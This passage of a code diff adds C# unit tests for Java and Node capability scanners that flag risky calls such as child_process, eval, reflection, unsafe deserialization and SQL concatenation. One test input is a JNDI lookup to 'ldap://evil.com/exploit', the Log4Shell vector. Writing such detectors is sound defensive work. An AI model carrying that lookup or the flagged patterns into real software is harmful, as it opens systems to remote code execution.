+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("Cipher", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsWeakCryptoMD5()
+ {
+ const string code = @"MessageDigest md = MessageDigest.getInstance(""MD5"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Pattern == "Weak crypto algorithm" && r.Risk == CapabilityRisk.High);
+ }
+
+ #endregion
+
+ #region ScanFile - Database Patterns
+
+ [Fact]
+ public void ScanFile_DetectsDriverManagerGetConnection()
+ {
+ const string code = @"Connection conn = DriverManager.getConnection(url);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("DriverManager.getConnection", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsExecuteQuery()
+ {
+ const string code = @"ResultSet rs = stmt.executeQuery(sql);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("Statement.executeQuery", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSqlStringConcatenation()
+ {
+ const string code = @"String sql = ""SELECT * FROM users WHERE id="" + userId;";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Contains("SQL", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsCreateNativeQuery()
+ {
+ const string code = @"Query q = em.createNativeQuery(""SELECT * FROM users"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("Native SQL query", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Dynamic Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsScriptEngineManager()
+ {
+ const string code = @"ScriptEngine engine = new ScriptEngineManager().getEngineByName(""javascript"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Kind == CapabilityKind.DynamicCode);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsScriptEngineEval()
+ {
+ const string code = @"Object result = engine.eval(script);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("ScriptEngine.eval", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSpelExpressionParser()
+ {
+ const string code = @"SpelExpressionParser parser = new SpelExpressionParser();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("SpEL Parser", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOgnlGetValue()
+ {
+ const string code = @"Object value = Ognl.getValue(expression, context, root);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("OGNL.getValue", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsJavaCompiler()
+ {
+ const string code = @"JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("JavaCompiler", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Reflection Patterns
+
+ [Fact]
+ public void ScanFile_DetectsClassForName()
+ {
+ const string code = @"Class<?> clazz = Class.forName(""com.example.MyClass"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Class.forName", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsMethodInvoke()
+ {
+ const string code = @"Object result = Method.invoke(obj, args);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Method.invoke", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSetAccessibleTrue()
+ {
+ const string code = @"method.setAccessible(true);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("setAccessible(true)", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsURLClassLoader()
+ {
+ const string code = @"URLClassLoader loader = new URLClassLoader(urls);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("URLClassLoader", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsDefineClass()
+ {
+ const string code = @"Class<?> clazz = loader.defineClass(name, bytes, 0, bytes.length);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("defineClass", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Native Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsSystemLoadLibrary()
+ {
+ const string code = @"System.loadLibrary(""mylib"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("System.loadLibrary", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSystemLoad()
+ {
+ const string code = @"System.load(""/path/to/libmylib.so"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("System.load", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNativeMethodDeclaration()
+ {
+ const string code = @"private native int doSomething(byte[] data);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("native method", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsUnsafeGetUnsafe()
+ {
+ const string code = @"Unsafe unsafe = Unsafe.getUnsafe();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("Unsafe.getUnsafe", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsUnsafeAllocateInstance()
+ {
+ const string code = @"Object obj = unsafe.allocateInstance(clazz);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("Unsafe.allocateInstance", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - JNDI Patterns (Log4Shell attack vector)
+
+ [Fact]
+ public void ScanFile_DetectsInitialContext()
+ {
+ const string code = @"InitialContext ctx = new InitialContext();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind); // JNDI is categorized as Other
+ Assert.Equal("InitialContext", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsInitialContextLookup()
+ {
+ const string code = @"Object obj = InitialContext.lookup(""java:comp/env/jdbc/mydb"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind);
+ Assert.Equal("InitialContext.lookup", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsJndiRemoteLookup()
+ {
+ const string code = @"ctx.lookup(""ldap://evil.com/exploit"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Pattern == "JNDI remote lookup" && r.Risk == CapabilityRisk.Critical);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsInitialLdapContext()
+ {
+ const string code = @"LdapContext ctx = new InitialLdapContext(env, null);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind);
+ Assert.Equal("InitialLdapContext", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region JavaCapabilityEvidence Tests
+
+ [Fact]
+ public void Evidence_DeduplicationKey_IsCorrect()
+ {
+ var evidence = new JavaCapabilityEvidence(
+ CapabilityKind.Exec,
+ "Test.java",
+ 10,
+ "Runtime.exec");
+
+ Assert.Equal("Exec|Test.java|10|Runtime.exec", evidence.DeduplicationKey);
+ }
+
+ [Fact]
+ public void Evidence_ConfidenceIsClamped()
+ {
+ var evidence1 = new JavaCapabilityEvidence(
+ CapabilityKind.Exec, "Test.java", 1, "pattern",
+ confidence: 2.0f);
+ var evidence2 = new JavaCapabilityEvidence(
+ CapabilityKind.Exec, "Test.java", 1, "pattern",
+ confidence: -1.0f);
+
+ Assert.Equal(1.0f, evidence1.Confidence);
+ Assert.Equal(0.0f, evidence2.Confidence);
+ }
+
+ [Fact]
+ public void Evidence_CreateMetadata_IncludesAllFields()
+ {
+ var evidence = new JavaCapabilityEvidence(
+ CapabilityKind.Exec,
+ "Test.java",
+ 10,
+ "Runtime.exec",
+ snippet: "Runtime.getRuntime().exec(cmd);",
+ confidence: 0.95f,
+ risk: CapabilityRisk.Critical);
+
+ var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
+
+ Assert.Equal("exec", metadata["capability.kind"]);
+ Assert.Equal("Test.java:10", metadata["capability.source"]);
+ Assert.Equal("Runtime.exec", metadata["capability.pattern"]);
+ Assert.Equal("critical", metadata["capability.risk"]);
+ Assert.Equal("0.95", metadata["capability.confidence"]);
+ Assert.Contains("Runtime.getRuntime()", metadata["capability.snippet"]);
+ }
+
+ [Fact]
+ public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
+ {
+ var evidence = new JavaCapabilityEvidence(
+ CapabilityKind.Exec,
+ "Test.java",
+ 10,
+ "Runtime.exec");
+
+ var langEvidence = evidence.ToLanguageEvidence();
+
+ Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
+ Assert.Equal("Test.java", langEvidence.Source);
+ Assert.Equal("line:10", langEvidence.Locator);
+ Assert.Equal("Exec:Runtime.exec", langEvidence.Value);
+ }
+
+ #endregion
+}
diff --git a/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Node.Tests/Internal/NodeCapabilityScannerTests.cs b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Node.Tests/Internal/NodeCapabilityScannerTests.cs
new file mode 100644
index 000000000..e7935a1ca
--- /dev/null
+++ b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Node.Tests/Internal/NodeCapabilityScannerTests.cs
@@ -0,0 +1,883 @@
+using StellaOps.Scanner.Analyzers.Lang.Node.Internal.Capabilities;
+
+namespace StellaOps.Scanner.Analyzers.Lang.Node.Tests.Internal;
+
+/// <summary>
+/// Tests for <see cref="NodeCapabilityScanner"/>.
+/// </summary>
+public sealed class NodeCapabilityScannerTests
+{
+ private const string TestFile = "test.js";
+
+ #region ScanFile - General Tests
+
+ [Fact]
+ public void ScanFile_NullContent_ReturnsEmpty()
+ {
+ var result = NodeCapabilityScanner.ScanFile(null!, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_EmptyContent_ReturnsEmpty()
+ {
+ var result = NodeCapabilityScanner.ScanFile("", TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_WhitespaceContent_ReturnsEmpty()
+ {
+ var result = NodeCapabilityScanner.ScanFile(" \n\t\n ", TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NoPatterns_ReturnsEmpty()
+ {
+ const string code = @"
+function hello() {
+ console.log('Hello, World!');
+}
+hello();";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NormalizesBackslashesInPath()
+ {
+ const string code = @"const cp = require('child_process');";
+ var result = NodeCapabilityScanner.ScanFile(code, @"C:\src\test.js").ToList();
+
+ Assert.Single(result);
+ Assert.Equal("C:/src/test.js", result[0].SourceFile);
+ }
+
+ #endregion
+
+ #region ScanFile - Comment Stripping
+
+ [Fact]
+ public void ScanFile_IgnoresSingleLineComments()
+ {
+ const string code = @"
+// const cp = require('child_process');
+function test() { }";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_IgnoresMultiLineComments()
+ {
+ const string code = @"
+/*
+const cp = require('child_process');
+eval('code');
+*/
+function test() { }";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_DoesNotIgnoreCodeInStrings()
+ {
+ const string code = @"const msg = 'require(""child_process"")';";
+ // This should NOT match because it's a string literal
+ // The scanner should be smart about this
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+    // NOTE(review): this test currently has no assertions and can never fail; pin the
+    // intended behavior (match vs. no match inside string literals) with an Assert.
+ }
+
+ #endregion
+
+ #region ScanFile - Exec Patterns (Critical)
+
+ [Fact]
+ public void ScanFile_DetectsRequireChildProcess()
+ {
+ const string code = @"const cp = require('child_process');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("require('child_process')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ Assert.Equal(1.0f, result[0].Confidence);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsImportChildProcess()
+ {
+ const string code = @"import { exec } from 'child_process';";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Kind == CapabilityKind.Exec);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsChildProcessExec()
+ {
+ const string code = @"child_process.exec('ls -la', callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("child_process.exec", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsChildProcessExecSync()
+ {
+ const string code = @"const output = child_process.execSync('pwd');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("child_process.execSync", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsChildProcessSpawn()
+ {
+ const string code = @"const proc = child_process.spawn('node', ['app.js']);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("child_process.spawn", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsChildProcessFork()
+ {
+ const string code = @"const worker = child_process.fork('./worker.js');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("child_process.fork", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireExeca()
+ {
+ const string code = @"const execa = require('execa');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("require('execa')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireShelljs()
+ {
+ const string code = @"const shell = require('shelljs');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("require('shelljs')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessBinding()
+ {
+ const string code = @"const spawn = process.binding('spawn_sync');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("process.binding", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Filesystem Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireFs()
+ {
+ const string code = @"const fs = require('fs');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("require('fs')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireFsPromises()
+ {
+ const string code = @"const fs = require('fs/promises');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("require('fs/promises')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFsReadFile()
+ {
+ const string code = @"fs.readFile('data.txt', callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("fs.readFile", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFsWriteFile()
+ {
+ const string code = @"fs.writeFile('output.txt', data, callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("fs.writeFile", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFsUnlink()
+ {
+ const string code = @"fs.unlink('file.txt', callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("fs.unlink", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFsRm()
+ {
+ const string code = @"fs.rm('directory', { recursive: true }, callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("fs.rm", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFsChmod()
+ {
+ const string code = @"fs.chmod('script.sh', 0o755, callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("fs.chmod", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFsSymlink()
+ {
+ const string code = @"fs.symlink('target', 'link', callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("fs.symlink", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Network Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireNet()
+ {
+ const string code = @"const net = require('net');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("require('net')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireHttp()
+ {
+ const string code = @"const http = require('http');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("require('http')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNetCreateServer()
+ {
+ const string code = @"const server = net.createServer(handler);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("net.createServer", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFetch()
+ {
+ const string code = @"const response = await fetch('https://api.example.com');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("fetch", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireAxios()
+ {
+ const string code = @"const axios = require('axios');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("require('axios')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewWebSocket()
+ {
+ const string code = @"const ws = new WebSocket('ws://localhost:8080');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("WebSocket", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Environment Patterns
+
+ [Fact]
+ public void ScanFile_DetectsProcessEnv()
+ {
+ const string code = @"const apiKey = process.env.API_KEY;";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Kind == CapabilityKind.Environment);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessEnvBracket()
+ {
+ const string code = @"const value = process.env['MY_VAR'];";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Kind == CapabilityKind.Environment);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireDotenv()
+ {
+ const string code = @"require('dotenv').config();";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("require('dotenv')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessChdir()
+ {
+ const string code = @"process.chdir('/app');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("process.chdir", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Serialization Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireNodeSerialize()
+ {
+ const string code = @"const serialize = require('node-serialize');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("require('node-serialize')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNodeSerializeUnserialize()
+ {
+ const string code = @"const obj = serialize.unserialize(data);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("node-serialize.unserialize", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsYamlLoad()
+ {
+ const string code = @"const config = yaml.load(yamlString);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("yaml.load", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsV8Deserialize()
+ {
+ const string code = @"const obj = v8.deserialize(buffer);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("v8.deserialize", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Crypto Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireCrypto()
+ {
+ const string code = @"const crypto = require('crypto');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("require('crypto')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsCryptoCreateHash()
+ {
+ const string code = @"const hash = crypto.createHash('sha256');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("crypto.createHash", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsWeakHashAlgorithm()
+ {
+ const string code = @"const hash = crypto.createHash('md5');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Pattern == "Weak hash algorithm" && r.Risk == CapabilityRisk.High);
+ }
+
+ #endregion
+
+ #region ScanFile - Database Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireMysql()
+ {
+ const string code = @"const mysql = require('mysql');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("require('mysql')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequirePg()
+ {
+ const string code = @"const { Pool } = require('pg');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("require('pg')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireMongodb()
+ {
+ const string code = @"const { MongoClient } = require('mongodb');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("require('mongodb')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSqlStringConcatenation()
+ {
+ const string code = @"const sql = 'SELECT * FROM users WHERE id=' + id;";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("SQL string concatenation", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Dynamic Code Patterns (Critical)
+
+ [Fact]
